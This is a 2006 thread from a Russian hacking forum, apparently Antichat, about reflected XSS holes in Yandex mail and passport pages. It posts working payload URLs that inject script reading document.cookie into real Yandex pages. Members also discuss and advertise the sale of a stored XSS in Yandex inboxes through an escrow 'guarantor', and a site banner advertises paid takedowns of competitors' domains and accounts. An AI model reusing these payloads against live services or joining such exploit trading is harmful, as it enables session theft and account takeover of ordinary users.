mail.yandex.ru passive xss

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
mail.yandex.ru passive xss

Опции темы

Поиск в этой теме

Опции просмотра

mail.yandex.ru passive xss

05.11.2006, 05:36

vectorg

Постоянный

Регистрация: 07.08.2005

Сообщений: 386

С нами: 10925666

Репутация: 454

mail.yandex.ru passive xss

Вот, наткнулся... Т.к. пассивная, выкладываю сюда.
Совершенно ничего не фильтруется, вообщем good

Цитата:

-http://mail.yandex.ru/colabook_formaddp?name="><script>alert(document.co okie)</script>

+ один товарищ тут продает нечто подобное.

З.Ы. Почему бы не закрепить yandex и rambler в этом разделе, т.к. это уже сделано с mail.ru?

𝕏 Twitter Reddit Telegram Копировать ссылку

05.11.2006, 12:56

vectorg

Постоянный

Регистрация: 07.08.2005

Сообщений: 386

С нами: 10925666

Репутация: 454

Это уже на ваше усмотрение - хотите, переносите...
Выложил сюда, только из-за того, что это продается.

05.11.2006, 14:10

Mobile

Регистрация: 18.02.2006

Сообщений: 1,090

С нами: 10644806

Репутация: 1564

Надо было в паблик выложить, испортить тому барыге бизнес

08.11.2006, 11:18

~~Elekt~~

Banned

Регистрация: 05.12.2005

Сообщений: 982

С нами: 10752806

Репутация: 1202

=) хехе

08.11.2006, 13:14

=Be$=

Постоянный

Регистрация: 21.01.2006

Сообщений: 310

С нами: 10685126

Репутация: 237

Как я помню он ее за 25уе продовал)))

11.11.2006, 21:46

Pionep

Новичок

Регистрация: 04.11.2006

Сообщений: 3

С нами: 10272493

Репутация: 0

Цитата:

Сообщение от VectorG

один товарищ тут продает нечто подобное.

Продаваемая мною бага НЕ ИЗВЕСТНА НИКОМУ!
С выше написанной уязвимостью не имеет никакой связи.
Работает в другом направлении.

+ к этому скрипт, приготовленный для жертвы, будет выполняться каждый раз при заходе на страницу входящих сообщений.

С учётом того, что наконец пройдена проверка Гарантом, ПОКУПАЕМ!

11.11.2006, 23:07

Pionep

Новичок

Регистрация: 04.11.2006

Сообщений: 3

С нами: 10272493

Репутация: 0

Как работает выше написанная бага?
В двух проверенных браузерах, "><script>alert(document.cookie)</script> аккуратно распечатывается в форме

11.11.2006, 23:18

Ksander

Постоянный

Регистрация: 21.06.2006

Сообщений: 931

С нами: 10467686

Репутация: 930

Наверно уже прикрыли, не пашет ни на ie, ни в myie.

23.12.2006, 23:44

_Great_

Флудер

Регистрация: 27.12.2005

Сообщений: 2,372

С нами: 10721066

Репутация: 4360

IE:

Код:

http://passport.yandex.ru/passport?mode=register&ncrnd=&step=one&confirmed=yes&idkey=&filled=yes&login=qwerty%22%20style='background:url(javascript:alert(document.cookie))'

правда глюки есть некоторые%)

#10

28.12.2006, 02:39

MyNick

Познающий

Регистрация: 18.09.2006

Сообщений: 40

С нами: 10339690

Репутация: 3

Ребята, короче вот http://ifolder.ru/735692 и вот http://ifolder.ru/735710 потом скажите мне пожалуста что вы об этом думаете !??

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
IPB 2.1.7 passive XSS	degeneration x	Уязвимости CMS / форумов	20	24.02.2007 00:02
Passive Xss на www.tgu.ru (почтовик)	_kREveDKo_	Уязвимости	0	31.05.2006 00:09
XSS на Yandex.RU	Gang100	Уязвимости	19	09.04.2006 16:42
Xss на yandex.ru	Pridu_ROCK	Уязвимости	1	04.03.2006 01:08